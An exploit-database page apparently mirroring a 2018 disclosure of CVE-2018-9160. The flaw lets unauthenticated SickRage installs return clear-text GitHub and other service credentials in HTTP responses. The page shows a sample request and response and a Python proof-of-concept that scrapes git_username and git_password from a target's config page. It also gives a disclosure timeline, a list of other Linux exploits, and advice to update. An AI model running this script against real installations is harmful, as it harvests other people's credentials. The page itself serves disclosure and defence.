Menu

Search for hundreds of thousands of exploits

"SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response"

Author

"Sven Fassbender"

Platform

linux

Release date

2018-04-26

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
# Exploit Title: SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
# Date: 2018-04-01
# Exploit Author: Sven Fassbender
# Vendor Homepage: https://sickrage.github.io
# Software Link: https://github.com/SickRage/SickRage
# Version: < v2018.03.09-1
# CVE : CVE-2018-9160
# Category: webapps

#1. Background information

"SickRage is an automatic Video Library Manager for TV Shows.
It watches for new episodes of your favourite shows, and when they are posted it does its magic: 
automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from https://sickrage.github.io

#2. Vulnerability description

SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses. 
Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default)

HTTP request:
GET /config/general/ HTTP/1.1
Host: 192.168.1.13:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.13:8081/config/backuprestore/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

	 
HTTP response:
HTTP/1.1 200 OK
Content-Length: 113397
Vary: Accept-Encoding
Server: TornadoServer/4.5.1
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"
Date: Fri, 02 Mar 2018 10:47:51 GMT
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html>
<html lang="nl_NL">
    <head>
		[...]
        <input type="text" name="git_username" id="git_username" value="email@example.com" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />
        [...]
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />
		[...]
        </div>
    </body>
</html>

#3. Proof of Concept

#!/usr/bin/env python
import urllib3
import sys
import requests
from BeautifulSoup import BeautifulSoup

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)

if __name__ == '__main__':
	if len(sys.argv) != 3:
		print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]"
	else:
		host = sys.argv[1]
		print "https://www.shodan.io/host/{0}".format(host)
		port = sys.argv[2]
		print "*** Get GitHub User credentials from SickRage ***"
		url = "http://{0}:{1}/config/general".format(host, port)
		response = requests.get(url, timeout=5)
		parsed_html = BeautifulSoup(response.text)
		try:
			git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value")
			git_password = parsed_html.body.find('input', {'id': 'git_password'}).get("value")
			if str(git_password) != "None" and str(git_password) != "None":
				if len(git_password) >= 1 and len(git_username) >= 1:
					print str(git_username)
					print str(git_password)
		except AttributeError:
			pass


#4. Timeline

[2018-03-07] Vulnerability discovered
[2018-03-08] Vendor contacted
[2018-03-08] Vendor replied
[2018-03-09] Vulnerability fixed. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)

#5. Recommendation

Update the SickRage installation on v2018.03.09-1 or later. 
Protect the access to the web application with proper user credentials.
Release Date Title Type Platform Author
2019-08-19 "Webmin 1.920 - Remote Code Execution" webapps linux "Fernando A. Lagos B"
2019-08-14 "ABC2MTEX 1.6.1 - Command Line Stack Overflow" dos linux "Carter Yagemann"
2019-08-12 "Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)" remote linux AkkuS
2019-08-12 "Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution" local linux "Etienne Lacoche"
2019-08-12 "Linux - Use-After-Free Reads in show_numa_stats()" dos linux "Google Security Research"
2019-07-30 "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)" remote linux Metasploit
2018-12-29 "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation" local linux bcoles
2018-12-29 "Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)" local linux bcoles
2018-12-29 "Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)" local linux bcoles
2019-07-24 "Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation" local linux bcoles
2019-07-26 "pdfresurrect 0.15 - Buffer Overflow" dos linux j0lama
2019-07-22 "Axway SecureTransport 5 - Unauthenticated XML Injection" webapps linux "Dominik Penner"
2019-07-22 "Comtrend-AR-5310 - Restricted Shell Escape" local linux "AMRI Amine"
2019-07-19 "Docker - Container Escape" local linux dominikczarnotatob
2019-07-22 "BACnet Stack 0.8.6 - Denial of Service" dos linux mmorillo
2019-07-19 "Web Ofisi Firma 13 - 'oz' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Rent a Car 3 - 'klima' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Firma Rehberi 1 - 'il' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 2 - 'ara' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi E-Ticaret 3 - 'a' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "fuelCMS 1.4.1 - Remote Code Execution" webapps linux 0xd0ff9
2019-07-18 "WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting" webapps linux LiquidWorm
2019-07-17 "Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting" webapps linux "Sarath Nair"
2019-07-17 "Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME" local linux "Google Security Research"
Release Date Title Type Platform Author
2018-04-26 "SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response" webapps linux "Sven Fassbender"
2018-03-28 "TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting" webapps multiple "Sven Fassbender"
2018-03-28 "TwonkyMedia Server 7.0.11-8.5 - Directory Traversal" webapps multiple "Sven Fassbender"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/44545/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/44545/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/44545/39709/sickrage-v20180309-clear-text-credentials-http-response/download/", "exploit_id": "44545", "exploit_description": "\"SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response\"", "exploit_date": "2018-04-26", "exploit_author": "\"Sven Fassbender\"", "exploit_type": "webapps", "exploit_platform": "linux", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse